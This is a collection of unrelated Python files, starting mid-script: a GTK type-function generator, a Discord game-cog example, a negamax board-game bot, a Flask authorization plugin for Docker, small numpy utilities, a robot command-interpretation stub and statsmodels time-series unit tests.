line = line.rstrip('\n').rstrip('\r')
# print line
match = re.search(r'\bg[dst]k_[a-zA-Z0-9_]*_get_type\b', line)
if match:
func = match.group(0)
if not func in funcs:
funcs.append(func)
if debug: print ('Found ', func)
file_output = ['G_GNUC_BEGIN_IGNORE_DEPRECATIONS']
funcs = sorted(funcs)
for f in funcs:
if f.startswith('gdk_x11'):
file_output += ['#ifdef GDK_WINDOWING_X11']
file_output += ['*tp++ = {0}();'.format(f)]
file_output += ['#endif']
elif f.startswith('gdk_broadway') or f.startswith('gsk_broadway'):
file_output += ['#ifdef GDK_WINDOWING_BROADWAY']
file_output += ['*tp++ = {0}();'.format(f)]
file_output += ['#endif']
elif f.startswith('gdk_wayland'):
file_output += ['#ifdef GDK_WINDOWING_WAYLAND']
file_output += ['*tp++ = {0}();'.format(f)]
file_output += ['#endif']
elif f.startswith('gdk_win32'):
file_output += ['#ifdef GDK_WINDOWING_WIN32']
file_output += ['*tp++ = {0}();'.format(f)]
file_output += ['#endif']
elif f.startswith('gdk_quartz'):
file_output += ['#ifdef GDK_WINDOWING_MACOS']
file_output += ['*tp++ = {0}();'.format(f)]
file_output += ['#endif']
elif f.startswith('gsk_vulkan'):
file_output += ['#ifdef GDK_RENDERING_VULKAN']
file_output += ['*tp++ = {0}();'.format(f)]
file_output += ['#endif']
else:
file_output += ['*tp++ = {0}();'.format(f)]
file_output += ['G_GNUC_END_IGNORE_DEPRECATIONS']
if debug: print (len(funcs), 'functions')
tmp_file = out_file + '~'
with open(tmp_file, 'w') as f:
f.write('\n'.join(file_output))
replace_if_changed(tmp_file, out_file)
|
# this file shows how you could use Bot.add_cog to add games to your bot
# first, create the bot instance
from discord.ext import commands
bot = commands.Bot("!") # ! is the prefix in this case
# now import the game you need
from disgames import Hangman
bot.add_cog(Hangman(bot))
# if you need 2 or more commands only, consider using the register_commands function instead
|
import sys
import random
import copy
import resource
from base_client import LiacBot
WHITE = 1
BLACK = -1
INFINITY = 100000000
# BOT =========================================================================
class KillBot(LiacBot):
name = 'KillBot'
ip = '127.0.0.1'
port = 50100
depth = 1
def __init__(self):
# Construtor
super(KillBot, self).__init__()
# Move os elementos no tabuleiro
def on_move(self, state):
# Pega o estado atual do tabuleiro
board = Board(state)
# Minimax
negamax = Negamax()
moves = negamax.run(board, -INFINITY, INFINITY, self.depth, color)
# Escolhe um dos movimento gerados pelo negamax
chosen_move = random.choice(moves['movement'])
# Aceita input manual se cair em um estado errado
if state['bad_move']:
print "bad_move"
print state['board']
raw_input()
# Executa o movimento escolhido
self.send_move(chosen_move[0], chosen_move[1])
# Footprint de memoria utilizada
print("Used mem:")
print(resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / 1000)
def on_game_over(self, state):
print 'Game Over.'
quit()
# =============================================================================
# MODELS ======================================================================
class Negamax(object):
def run(self, board, alpha, beta, act_depth, act_color):
if act_depth == 0 or board.game_over():
return { 'value': board.evaluate()*act_color, 'movement': None }
best_move = { 'value': -INFINITY, 'movement': None }
movements = board.generate()
if len(movements)==0:
return best_move
for b_movement in movements:
movement = self.run(b_movement, -alpha, -beta, act_depth-1, -act_color)
movement['value'] = -movement['value']
if best_move['value'] <= movement['value']:
if best_move['value'] < movement['value']:
best_move = {'value':movement['value'], 'movement':[]}
best_move['movement'].append((b_movement._from, b_movement._to))
alpha = max(alpha,movement['value'])
if alpha >= beta:
break
return best_move
class Board(object):
def __init__(self, state):
self.value = -1
self.cells = [[None for j in xrange(8)] for i in xrange(8)]
self.my_pieces = []
self.my_opponent_pieces = []
PIECES = {
'r': Rook,
'p': Pawn,
'n': Knight,
}
my_team = state['who_moves']
c = state['board']
i = 0
for row in xrange(7, -1, -1):
for col in xrange(0, 8):
if c[i] != '.':
cls = PIECES[c[i].lower()]
team = BLACK if c[i].lower() == c[i] else WHITE
piece = cls(self, team, (row, col))
self.cells[row][col] = piece
if team == my_team:
self.my_pieces.append(piece)
else:
self.my_opponent_pieces.append(piece)
i += 1
# Avalia a si mesmo ao criar uma instancia
self.value = self.evaluate()
def __getitem__(self, pos):
if not 0 <= pos[0] <= 7 or not 0 <= pos[1] <= 7:
return None
return self.cells[pos[0]][pos[1]]
def __setitem__(self, pos, value):
self._cells[pos[0]][pos[1]] = value
def is_empty(self, pos):
return self[pos] is None
def update_pieces(self, my_color):
self.my_pieces = []
self.my_opponent_pieces = []
for row in xrange(0, 8):
for col in xrange(0, 8):
piece = self.cells[row][col]
if piece != None:
if piece.team == my_color:
self.my_pieces.append(piece)
else:
self.my_opponent_pieces.append(piece)
def print_board(self):
for row in xrange(0, 8):
for col in xrange(0, 8):
if isinstance(self.cells[row][col], Pawn):
if self.cells[row][col].team == BLACK:
if col == 7:
print "P "
else:
print "P ",
else:
if col == 7:
print "p "
else:
print "p ",
elif isinstance(self.cells[row][col], Rook):
if self.cells[row][col].team == BLACK:
if col == 7:
print "R "
else:
print "R ",
else:
if col == 7:
print "r "
else:
print "r ",
elif isinstance(self.cells[row][col], Knight):
if self.cells[row][col].team == BLACK:
if col == 7:
print "K "
else:
print "K ",
else:
if col == 7:
print "k "
else:
print "k ",
else:
if col == 7:
print ". "
else:
print ". ",
def generate(self):
moves = []
for piece in self.my_pieces:
ms = piece.generate()
ms = [(piece.position, m) for m in ms]
moves.extend(ms)
# Gerar tabuleiros a partir de movimentos
boards = []
for move in moves:
new_board = copy.deepcopy(self)
new_board.cells[move[1][0]][move[1][1]] = new_board.cells[move[0][0]][move[0][1]]
new_board.cells[move[0][0]][move[0][1]] = None
new_board._from = (move[0][0], move[0][1])
new_board._to = (move[1][0], move[1][1])
boards.append(new_board)
return boards
# Funcao de avaliacao do tabuleiro
def evaluate(self):
white_pawns = 0
black_pawns = 0
white_rooks = 0
black_rooks = 0
white_knights = 0
black_knights = 0
board_value = 0
for i in xrange(0, 8):
for j in xrange(0, 8):
piece = self.cells[i][j]
# Verifica se existe uma peca na posicao
if piece is None:
continue
elif piece.team == BLACK:
if isinstance(piece, Pawn):
board_value = board_value - i
black_pawns += 1
if isinstance(piece, Rook):
black_rooks += 1
if isinstance(piece, Knight):
black_knights += 1
else:
if isinstance(piece, Pawn):
board_value = board_value + (7-i)
white_pawns += 1
if isinstance(piece, Rook):
white_rooks += 1
if isinstance(piece, Knight):
white_knights += 1
# Verifica se alguem venceu
if white_pawns == 0:
self.value = INFINITY
elif black_pawns == 0:
self.value = -INFINITY
# Calcula a funcao de avaliacao do tabuleiro
board_value = board_value + 10*(white_pawns - black_pawns) + 3*(white_knights - black_knights) + 5*(white_rooks - black_rooks)
self.value = board_value
return self.value
# Testa posicao de game over
def game_over(self):
# Verifica se alguem venceu
for i in xrange(8):
if isinstance(self.cells[0][i], Pawn) and self.cells[0][i].team == BLACK:
return True
elif isinstance(self.cells[7][i], Pawn) and self.cells[0][i].team == WHITE:
return True
# Verifica se ainda existem peoes
count_pawns = 0
for i in xrange(8):
for j in xrange(8):
if isinstance(self.cells[i][j], Pawn):
count_pawns += 1
if count_pawns == 0:
return True
return False
class Piece(object):
def __init__(self):
self.board = None
self.team = None
self.position = None
self.type = None
def generate(self):
pass
def is_opponent(self, piece):
return piece is not None and piece.team != self.team
class Pawn(Piece):
def __init__(self, board, team, position):
self.board = board
self.team = team
self.position = position
def generate(self):
moves = []
my_row, my_col = self.position
d = self.team
# Movement to 1 forward
pos = (my_row + d*1, my_col)
if self.board.is_empty(pos):
moves.append(pos)
# Normal capture to right
pos = (my_row + d*1, my_col+1)
piece = self.board[pos]
if self.is_opponent(piece):
moves.append(pos)
# Normal capture to left
pos = (my_row + d*1, my_col-1)
piece = self.board[pos]
if self.is_opponent(piece):
moves.append(pos)
# Initial Movement
#if (my_row == 7 or my_row == 1):
#pos = (my_row + d*2, my_col)
#if self.board.is_empty(pos):
#moves.append(pos)
# Enpassant
return moves
class Rook(Piece):
def __init__(self, board, team, position):
self.board = board
self.team = team
self.position = position
def _col(self, dir_):
my_row, my_col = self.position
d = -1 if dir_ < 0 else 1
for col in xrange(1, abs(dir_)):
yield (my_row, my_col + d*col)
def _row(self, dir_):
my_row, my_col = self.position
d = -1 if dir_ < 0 else 1
for row in xrange(1, abs(dir_)):
yield (my_row + d*row, my_col)
def _gen(self, moves, gen, idx):
for pos in gen(idx):
piece = self.board[pos]
if piece is None:
moves.append(pos)
continue
elif piece.team != self.team:
moves.append(pos)
break
def generate(self):
moves = []
my_row, my_col = self.position
self._gen(moves, self._col, 8-my_col) # RIGHT
self._gen(moves, self._col, -my_col-1) # LEFT
self._gen(moves, self._row, 8-my_row) # TOP
self._gen(moves, self._row, -my_row-1) # BOTTOM
return moves
class Knight(Piece):
def __init__(self, board, team, position):
self.board = board
self.team = team
self.position = position
def _gen(self, moves, row, col):
if not 0 <= row <= 7 or not 0 <= col <= 7:
return
piece = self.board[(row, col)]
if piece is None or self.is_opponent(piece):
moves.append((row, col))
def generate(self):
moves = []
my_row, my_col = self.position
self._gen(moves, my_row+1, my_col+2)
self._gen(moves, my_row+1, my_col-2)
self._gen(moves, my_row-1, my_col+2)
self._gen(moves, my_row-1, my_col-2)
self._gen(moves, my_row+2, my_col+1)
self._gen(moves, my_row+2, my_col-1)
self._gen(moves, my_row-2, my_col+1)
self._gen(moves, my_row-2, my_col-1)
return moves
# =============================================================================
if __name__ == '__main__':
color = 1
port = 50100
if len(sys.argv) > 1:
if sys.argv[1] == 'black':
color = -1
port = 50200
bot = KillBot()
bot.port = port
if len(sys.argv) > 2:
if sys.argv[2]:
bot.depth = int(sys.argv[2])
bot.start()
|
# vim:set ts=4 sw=4 et:
"""Leash server plugin for docker.
This module is responsible for dispatching HTTP requests.
"""
import sys
from flask import jsonify, request
from . import app
from .exceptions import (InvalidRequestException, NoSuchCheckModuleException,
UnauthorizedException)
from .processor import Processor
sys.dont_write_bytecode = True
__version__ = '0.0.1.dev0'
def setup_app(application):
"""Initialize the application
"""
application.config["processor"] = Processor()
application.config["processor"].load_config()
setup_app(app)
@app.route('/')
def index():
"""Main entry point. it respond to the `GET` method for the `/` uri."""
return "Docker Leash Plugin"
@app.route("/Plugin.Activate", methods=['POST'])
def activate():
"""Return implemented event system.
It is used internally by the Docker daemon to indicate which event system
is concerned by the plugin.
In the case of this plugin, it return `authz`.
See the `official docker documentation
<https://docs.docker.com/engine/extend/plugin_api/#pluginactivate>`__.
**Request**:
.. sourcecode:: http
GET /Plugin.Activate HTTP/1.1
Host: example.com
Accept: application/json
**Response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: application/json
{
"Implements": ["authz"]
}
:resheader Content-Type: application/json
:status 200: valid response
:rtype: :class:`flask.Response`
"""
return jsonify({'Implements': ['authz']})
@app.route("/AuthZPlugin.AuthZReq", methods=['POST'])
def authz_request():
"""Process a request for authorization.
This is one of the main feature of this plugin.
Depending on the configuration, the system, will allow or deny a request.
For a specific user, if no configuration match the `RequestMethod` and
the `RequestUri`, then the default action is to deny the request.
.. seealso::
Function :func:`authz_response` for response authentication.
.. seealso::
See `official docker documentation
<https://docs.docker.com/engine/extend/plugins_authorization/#request-authorization>`__.
**Request**:
.. sourcecode:: http
GET /AuthZPlugin.AuthZReq HTTP/1.1
Host: example.com
Accept: application/json
{
"User": "mal",
"AuthenticationMethod": "TLS",
"RequestMethod": "POST",
"RequestUri": "/v1.32/containers/json",
"RequestHeaders": "<base64 encoded string>",
"RequestBody": "<base64 encoded string>"
}
**Response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: application/json
{
"Allow": "true",
"Msg": "Authorization granted",
"Err": "Authorization granted"
}
:reqheader Accept: application/json
:<json string User: The user identification
:<json string AuthenticationMethod: The authentication method used
:<json enum RequestMethod: The HTTP method (GET/DELETE/POST)
:<json string RequestUri: The HTTP request URI including API version
(e.g., /v1.32/containers/json)
:<json map[string]string RequestHeaders: Request headers as key value pairs
(without the authorization header)
:<json []byte RequestBody: Raw request body
:>json bool Allow: Boolean value indicating whether the request is allowed
or denied
:>json string Msg: Authorization message
(will be returned to the client in case the access is denied)
:>json string Err: Error message.
Will be returned to the client in case the plugin
encounter an error.
The string value supplied may appear in logs,
so should not include confidential information.
:resheader Content-Type: application/json
:status 200: valid response
:status 400: malformed request
:status 422: invalid parameters
:rtype: :class:`flask.Response`
"""
try:
app.config["processor"].run(request.data)
except InvalidRequestException as error:
app.logger.error("REQUEST DENIED: %s", error)
return jsonify({
"Allow": False,
"Msg": str(error)
})
except UnauthorizedException as error:
app.logger.error("REQUEST DENIED: %s", error)
return jsonify({
"Allow": False,
"Msg": str(error)
})
except NoSuchCheckModuleException as error: # pragma: no cover
app.logger.critical("REQUEST DENIED: %s", error)
return jsonify({
"Allow": False,
"Msg": str(error)
})
# except BaseException as error: # pragma: no cover
# app.logger.critical("REQUEST DENIED: %s", error)
# return jsonify({
# "Allow": False,
# "Msg": str(error)
# })
app.logger.info("REQUEST ALLOWED")
return jsonify({
"Allow": True,
"Msg": "The authorization succeeded."
})
@app.route("/AuthZPlugin.AuthZRes", methods=['POST'])
def authz_response():
"""Process a response for authorization.
This is one of the main feature of this plugin.
Depending on the configuration, the system, will allow or deny a request.
.. Warning::
In the current version, we don't check any parameter, and always accept the request.
In contrast to :func:`authz_response`, this endpoint is called after
the action has been processed by the docker daemon.
The request payload contains additional fields representing the response
from the daemon.
.. seealso::
Function :func:`authz_request` for request authentication.
.. seealso::
Check the `official docker documentation
<https://docs.docker.com/engine/extend/plugins_authorization/#response-authorization>`__.
**Request**:
.. sourcecode:: http
GET /AuthZPlugin.AuthZReq HTTP/1.1
Host: example.com
Accept: application/json
{
"User": "mal",
"AuthenticationMethod": "TLS",
"RequestMethod": "POST",
"RequestUri": "/v1.32/containers/json",
"RequestHeaders": "<base64 encoded string>",
"RequestBody": "<base64 encoded string>",
"ResponseStatusCode": "200",
"ResponseHeaders": "<base64 encoded string>",
"ResponseBody": "<base64 encoded string>"
}
**Response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Vary: Accept
Content-Type: application/json
{
"Allow": "true",
"Msg": "Authorization granted",
"Err": "Authorization granted"
}
:reqheader Accept: application/json
:<json string User: The user identification
:<json string AuthenticationMethod: The authentication method used
:<json enum RequestMethod: The HTTP method (GET/DELETE/POST)
:<json string RequestUri: The HTTP request URI including API version
(e.g., /v1.32/containers/json)
:<json map[string]string RequestHeaders: Request headers as key value pairs
(without the authorization header)
:<json []byte RequestBody: Raw request body
:<json int ResponseStatusCode: Status code from the docker daemon
:<json map[string]string ResponseHeaders: Response headers as key value pairs
:<json []byte ResponseBody: Raw docker daemon response body
:>json bool Allow: Boolean value indicating whether the request is allowed or denied
:>json string Msg: Authorization message
(will be returned to the client in case the access is denied)
:>json string Err: Error message.
Will be returned to the client in case the plugin encounter
an error.
The string value supplied may appear in logs,
so should not include confidential information.
:resheader Content-Type: application/json
:status 200: valid response
:status 400: malformed request
:status 422: invalid parameters
:rtype: :class:`flask.Response`
"""
response = {"Allow": True}
return jsonify(**response)
|
import numpy as np
class CuboidMesh():
"""docstring for CuboidMesh"""
def __init__(self, arg):
super(CuboidMesh, self).__init__()
@staticmethod
def meshgrid_3d(x_1d, y_1d, z_1d):
'''
Suppose x_1d.shape = M, y_1d.shape = N, z_1d.shape = P
Then, this function will return 3D arrays x_3d,y_3d,z_3d each of size (P,N,M)
The numpy meshgrid gives unusual ordering.
'''
M = x_1d.shape[0]
N = y_1d.shape[0]
P = z_1d.shape[0]
x_2d, y_2d = np.meshgrid(x_1d, y_1d)
x_3d = np.tile(x_2d, (P,1,1))
y_3d = np.tile(y_2d, (P,1,1))
z_3d = np.reshape(np.repeat(z_1d, (N*M)), (P,N,M))
# print("x_3d = \n", x_3d)
# print("y_3d = \n", y_3d)
# print("z_3d = \n", z_3d)
# exit()
return x_3d, y_3d, z_3d |
import numpy, random, math
v = [0]
while numpy.std(v) <= 3:
v = [int(random.gauss(0, 3)) for i in range(8)]
for i in range(8):
if v[i] == 0:
v[i] = 1
for i in range(8):
print -math.pi+i*math.pi/4, v[i]
|
# code dependencies
import kb_services
import parsing
import interpretation
# network toolkit
import networkx as nx
# regular expressions
import re
# drawing
# from pyrobotics.messages import Command
def interpret_command(sentence_string):
print "lol"
G = kb_services.load_semantic_network()
grounded_commands = interpretation.sentence_grounder(G, sentence_string)
print "loll"
print "grounded command: ", grounded_commands
for each_command in grounded_commands:
expression = interpretation.generate_dependency(G, each_command)
print "generated expression to planner: ", expression
print "lolll"
# sentences = interpretation.break_sentence(sentence_string)
# print "hi: ", sentences
# for command in sentences[0:1]:
# grounded_commands = interpretation.sentence_grounder(G, command)
# print "grounded command: ", grounded_commands
#
# for each_command in grounded_commands:
# expression = interpretation.generate_dependency(G, each_command)
# print "output expression: ", expression
# if commands != [False]:
# interpreted_sentences
# interpreted_sentences += 1
# commands[0] = re.sub(' \)', ')', commands[0])
# commands[0] = re.sub('_', ' ', commands[0])
return expression
#print " test: ", interpret_command("take the orange juice from the shelf and deliver it to carmen at the dining room")
#print " test: ", interpret_command("take the milk from the kitchen and deliver it to john in the living room")
#print " --------------------------------- "
#print " test: ", interpret_command("take the milk from the kitchen and deliver it to me")
#print " --------------------------------- "
#print " test: ", interpret_command("take the milk from the kitchen and deliver it to the dining room")
|
from statsmodels.compat.numpy import lstsq
from statsmodels.compat.pandas import assert_index_equal
from statsmodels.compat.platform import PLATFORM_WIN
from statsmodels.compat.python import lrange
import os
import warnings
import numpy as np
from numpy.testing import (
assert_,
assert_allclose,
assert_almost_equal,
assert_equal,
assert_raises,
)
import pandas as pd
from pandas import DataFrame, Series, date_range
import pytest
from scipy.interpolate import interp1d
from statsmodels.datasets import macrodata, modechoice, nile, randhie, sunspots
from statsmodels.tools.sm_exceptions import (
CollinearityWarning,
InfeasibleTestError,
InterpolationWarning,
MissingDataError,
)
# Remove imports when range unit root test gets an R implementation
from statsmodels.tools.validation import array_like, bool_like
from statsmodels.tsa.arima_process import arma_acovf
from statsmodels.tsa.statespace.sarimax import SARIMAX
from statsmodels.tsa.stattools import (
acf,
acovf,
adfuller,
arma_order_select_ic,
breakvar_heteroskedasticity_test,
ccovf,
coint,
grangercausalitytests,
innovations_algo,
innovations_filter,
kpss,
levinson_durbin,
levinson_durbin_pacf,
pacf,
pacf_burg,
pacf_ols,
pacf_yw,
range_unit_root_test,
zivot_andrews,
)
DECIMAL_8 = 8
DECIMAL_6 = 6
DECIMAL_5 = 5
DECIMAL_4 = 4
DECIMAL_3 = 3
DECIMAL_2 = 2
DECIMAL_1 = 1
CURR_DIR = os.path.dirname(os.path.abspath(__file__))
@pytest.fixture(scope="module")
def acovf_data():
rnd = np.random.RandomState(12345)
return rnd.randn(250)
class CheckADF(object):
"""
Test Augmented Dickey-Fuller
Test values taken from Stata.
"""
levels = ["1%", "5%", "10%"]
data = macrodata.load_pandas()
x = data.data["realgdp"].values
y = data.data["infl"].values
def test_teststat(self):
assert_almost_equal(self.res1[0], self.teststat, DECIMAL_5)
def test_pvalue(self):
assert_almost_equal(self.res1[1], self.pvalue, DECIMAL_5)
def test_critvalues(self):
critvalues = [self.res1[4][lev] for lev in self.levels]
assert_almost_equal(critvalues, self.critvalues, DECIMAL_2)
class TestADFConstant(CheckADF):
"""
Dickey-Fuller test for unit root
"""
@classmethod
def setup_class(cls):
cls.res1 = adfuller(cls.x, regression="c", autolag=None, maxlag=4)
cls.teststat = 0.97505319
cls.pvalue = 0.99399563
cls.critvalues = [-3.476, -2.883, -2.573]
class TestADFConstantTrend(CheckADF):
""""""
@classmethod
def setup_class(cls):
cls.res1 = adfuller(cls.x, regression="ct", autolag=None, maxlag=4)
cls.teststat = -1.8566374
cls.pvalue = 0.67682968
cls.critvalues = [-4.007, -3.437, -3.137]
# FIXME: do not leave commented-out
# class TestADFConstantTrendSquared(CheckADF):
# """
# """
# pass
# TODO: get test values from R?
class TestADFNoConstant(CheckADF):
""""""
@classmethod
def setup_class(cls):
with pytest.warns(FutureWarning):
adfuller(cls.x, regression="nc", autolag=None, maxlag=4)
cls.res1 = adfuller(cls.x, regression="n", autolag=None, maxlag=4)
cls.teststat = 3.5227498
cls.pvalue = 0.99999
# Stata does not return a p-value for noconstant.
# Tau^max in MacKinnon (1994) is missing, so it is
# assumed that its right-tail is well-behaved
cls.critvalues = [-2.587, -1.950, -1.617]
# No Unit Root
class TestADFConstant2(CheckADF):
@classmethod
def setup_class(cls):
cls.res1 = adfuller(cls.y, regression="c", autolag=None, maxlag=1)
cls.teststat = -4.3346988
cls.pvalue = 0.00038661
cls.critvalues = [-3.476, -2.883, -2.573]
class TestADFConstantTrend2(CheckADF):
@classmethod
def setup_class(cls):
cls.res1 = adfuller(cls.y, regression="ct", autolag=None, maxlag=1)
cls.teststat = -4.425093
cls.pvalue = 0.00199633
cls.critvalues = [-4.006, -3.437, -3.137]
class TestADFNoConstant2(CheckADF):
@classmethod
def setup_class(cls):
cls.res1 = adfuller(cls.y, regression="n", autolag=None, maxlag=1)
cls.teststat = -2.4511596
cls.pvalue = 0.013747
# Stata does not return a p-value for noconstant
# this value is just taken from our results
cls.critvalues = [-2.587, -1.950, -1.617]
_, _1, _2, cls.store = adfuller(
cls.y, regression="n", autolag=None, maxlag=1, store=True
)
def test_store_str(self):
assert_equal(
self.store.__str__(), "Augmented Dickey-Fuller Test Results"
)
class CheckCorrGram(object):
"""
Set up for ACF, PACF tests.
"""
data = macrodata.load_pandas()
x = data.data["realgdp"]
filename = os.path.join(CURR_DIR, "results", "results_corrgram.csv")
results = pd.read_csv(filename, delimiter=",")
class TestACF(CheckCorrGram):
"""
Test Autocorrelation Function
"""
@classmethod
def setup_class(cls):
cls.acf = cls.results["acvar"]
# cls.acf = np.concatenate(([1.], cls.acf))
cls.qstat = cls.results["Q1"]
cls.res1 = acf(cls.x, nlags=40, qstat=True, alpha=0.05, fft=False)
cls.confint_res = cls.results[["acvar_lb", "acvar_ub"]].values
def test_acf(self):
assert_almost_equal(self.res1[0][1:41], self.acf, DECIMAL_8)
def test_confint(self):
centered = self.res1[1] - self.res1[1].mean(1)[:, None]
assert_almost_equal(centered[1:41], self.confint_res, DECIMAL_8)
def test_qstat(self):
assert_almost_equal(self.res1[2][:40], self.qstat, DECIMAL_3)
# 3 decimal places because of stata rounding
# FIXME: enable/xfail/skip or delete
# def pvalue(self):
# pass
# NOTE: should not need testing if Q stat is correct
class TestACF_FFT(CheckCorrGram):
# Test Autocorrelation Function using FFT
@classmethod
def setup_class(cls):
cls.acf = cls.results["acvarfft"]
cls.qstat = cls.results["Q1"]
cls.res1 = acf(cls.x, nlags=40, qstat=True, fft=True)
def test_acf(self):
assert_almost_equal(self.res1[0][1:], self.acf, DECIMAL_8)
def test_qstat(self):
# todo why is res1/qstat 1 short
assert_almost_equal(self.res1[1], self.qstat, DECIMAL_3)
class TestACFMissing(CheckCorrGram):
# Test Autocorrelation Function using Missing
@classmethod
def setup_class(cls):
cls.x = np.concatenate((np.array([np.nan]), cls.x))
cls.acf = cls.results["acvar"] # drop and conservative
cls.qstat = cls.results["Q1"]
cls.res_drop = acf(
cls.x, nlags=40, qstat=True, alpha=0.05, missing="drop", fft=False
)
cls.res_conservative = acf(
cls.x,
nlags=40,
qstat=True,
alpha=0.05,
fft=False,
missing="conservative",
)
cls.acf_none = np.empty(40) * np.nan # lags 1 to 40 inclusive
cls.qstat_none = np.empty(40) * np.nan
cls.res_none = acf(
cls.x, nlags=40, qstat=True, alpha=0.05, missing="none", fft=False
)
def test_raise(self):
with pytest.raises(MissingDataError):
acf(
self.x,
nlags=40,
qstat=True,
fft=False,
alpha=0.05,
missing="raise",
)
def test_acf_none(self):
assert_almost_equal(self.res_none[0][1:41], self.acf_none, DECIMAL_8)
def test_acf_drop(self):
assert_almost_equal(self.res_drop[0][1:41], self.acf, DECIMAL_8)
def test_acf_conservative(self):
assert_almost_equal(
self.res_conservative[0][1:41], self.acf, DECIMAL_8
)
def test_qstat_none(self):
# todo why is res1/qstat 1 short
assert_almost_equal(self.res_none[2], self.qstat_none, DECIMAL_3)
# FIXME: enable/xfail/skip or delete
# how to do this test? the correct q_stat depends on whether nobs=len(x) is
# used when x contains NaNs or whether nobs<len(x) when x contains NaNs
# def test_qstat_drop(self):
# assert_almost_equal(self.res_drop[2][:40], self.qstat, DECIMAL_3)
class TestPACF(CheckCorrGram):
@classmethod
def setup_class(cls):
cls.pacfols = cls.results["PACOLS"]
cls.pacfyw = cls.results["PACYW"]
def test_ols(self):
pacfols, confint = pacf(self.x, nlags=40, alpha=0.05, method="ols")
assert_almost_equal(pacfols[1:], self.pacfols, DECIMAL_6)
centered = confint - confint.mean(1)[:, None]
# from edited Stata ado file
res = [[-0.1375625, 0.1375625]] * 40
assert_almost_equal(centered[1:41], res, DECIMAL_6)
# check lag 0
assert_equal(centered[0], [0.0, 0.0])
assert_equal(confint[0], [1, 1])
assert_equal(pacfols[0], 1)
def test_ols_inefficient(self):
lag_len = 5
pacfols = pacf_ols(self.x, nlags=lag_len, efficient=False)
x = self.x.copy()
x -= x.mean()
n = x.shape[0]
lags = np.zeros((n - 5, 5))
lead = x[5:]
direct = np.empty(lag_len + 1)
direct[0] = 1.0
for i in range(lag_len):
lags[:, i] = x[5 - (i + 1) : -(i + 1)]
direct[i + 1] = lstsq(lags[:, : (i + 1)], lead, rcond=None)[0][-1]
assert_allclose(pacfols, direct, atol=1e-8)
def test_yw(self):
pacfyw = pacf_yw(self.x, nlags=40, method="mle")
assert_almost_equal(pacfyw[1:], self.pacfyw, DECIMAL_8)
def test_ld(self):
pacfyw = pacf_yw(self.x, nlags=40, method="mle")
pacfld = pacf(self.x, nlags=40, method="ldb")
assert_almost_equal(pacfyw, pacfld, DECIMAL_8)
pacfyw = pacf(self.x, nlags=40, method="yw")
pacfld = pacf(self.x, nlags=40, method="lda")
assert_almost_equal(pacfyw, pacfld, DECIMAL_8)
class TestBreakvarHeteroskedasticityTest(object):
from scipy.stats import chi2, f
def test_1d_input(self):
input_residuals = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0]
expected_statistic = (4.0 ** 2 + 5.0 ** 2) / (0.0 ** 2 + 1.0 ** 2)
# ~ F(2, 2), two-sided test
expected_pvalue = 2 * min(
self.f.cdf(expected_statistic, 2, 2),
self.f.sf(expected_statistic, 2, 2),
)
actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
input_residuals
)
assert actual_statistic == expected_statistic
assert actual_pvalue == expected_pvalue
def test_2d_input_with_missing_values(self):
input_residuals = np.array(
[
[0.0, 0.0, np.nan],
[1.0, np.nan, 1.0],
[2.0, 2.0, np.nan],
[3.0, 3.0, 3.0],
[4.0, 4.0, 4.0],
[5.0, 5.0, 5.0],
[6.0, 6.0, 6.0],
[7.0, 7.0, 7.0],
[8.0, 8.0, 8.0],
]
)
expected_statistic = np.array(
[
(8.0 ** 2 + 7.0 ** 2 + 6.0 ** 2)
/ (0.0 ** 2 + 1.0 ** 2 + 2.0 ** 2),
(8.0 ** 2 + 7.0 ** 2 + 6.0 ** 2) / (0.0 ** 2 + 2.0 ** 2),
np.nan,
]
)
expected_pvalue = np.array(
[
2
* min(
self.f.cdf(expected_statistic[0], 3, 3),
self.f.sf(expected_statistic[0], 3, 3),
),
2
* min(
self.f.cdf(expected_statistic[1], 3, 2),
self.f.sf(expected_statistic[1], 3, 2),
),
np.nan,
]
)
actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
input_residuals
)
assert_equal(actual_statistic, expected_statistic)
assert_equal(actual_pvalue, expected_pvalue)
@pytest.mark.parametrize(
"subset_length,expected_statistic,expected_pvalue",
[
(2, 41, 2 * min(f.cdf(41, 2, 2), f.sf(41, 2, 2))),
(0.5, 10, 2 * min(f.cdf(10, 3, 3), f.sf(10, 3, 3))),
],
)
def test_subset_length(
self, subset_length, expected_statistic, expected_pvalue
):
input_residuals = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0]
actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
input_residuals,
subset_length=subset_length,
)
assert actual_statistic == expected_statistic
assert actual_pvalue == expected_pvalue
@pytest.mark.parametrize(
"alternative,expected_statistic,expected_pvalue",
[
("two-sided", 41, 2 * min(f.cdf(41, 2, 2), f.sf(41, 2, 2))),
("decreasing", 1 / 41, f.sf(1 / 41, 2, 2)),
("increasing", 41, f.sf(41, 2, 2)),
],
)
def test_alternative(
self, alternative, expected_statistic, expected_pvalue
):
input_residuals = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0]
actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
input_residuals,
alternative=alternative,
)
assert actual_statistic == expected_statistic
assert actual_pvalue == expected_pvalue
def test_use_chi2(self):
input_residuals = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0]
expected_statistic = (4.0 ** 2 + 5.0 ** 2) / (0.0 ** 2 + 1.0 ** 2)
expected_pvalue = 2 * min(
self.chi2.cdf(2 * expected_statistic, 2),
self.chi2.sf(2 * expected_statistic, 2),
)
actual_statistic, actual_pvalue = breakvar_heteroskedasticity_test(
input_residuals,
use_f=False,
)
assert actual_statistic == expected_statistic
assert actual_pvalue == expected_pvalue
class CheckCoint(object):
"""
Test Cointegration Test Results for 2-variable system
Test values taken from Stata
"""
levels = ["1%", "5%", "10%"]
data = macrodata.load_pandas()
y1 = data.data["realcons"].values
y2 = data.data["realgdp"].values
def test_tstat(self):
assert_almost_equal(self.coint_t, self.teststat, DECIMAL_4)
# this does not produce the old results anymore
class TestCoint_t(CheckCoint):
"""
Get AR(1) parameter on residuals
"""
@classmethod
def setup_class(cls):
# cls.coint_t = coint(cls.y1, cls.y2, trend="c")[0]
cls.coint_t = coint(cls.y1, cls.y2, trend="c", maxlag=0, autolag=None)[
0
]
cls.teststat = -1.8208817
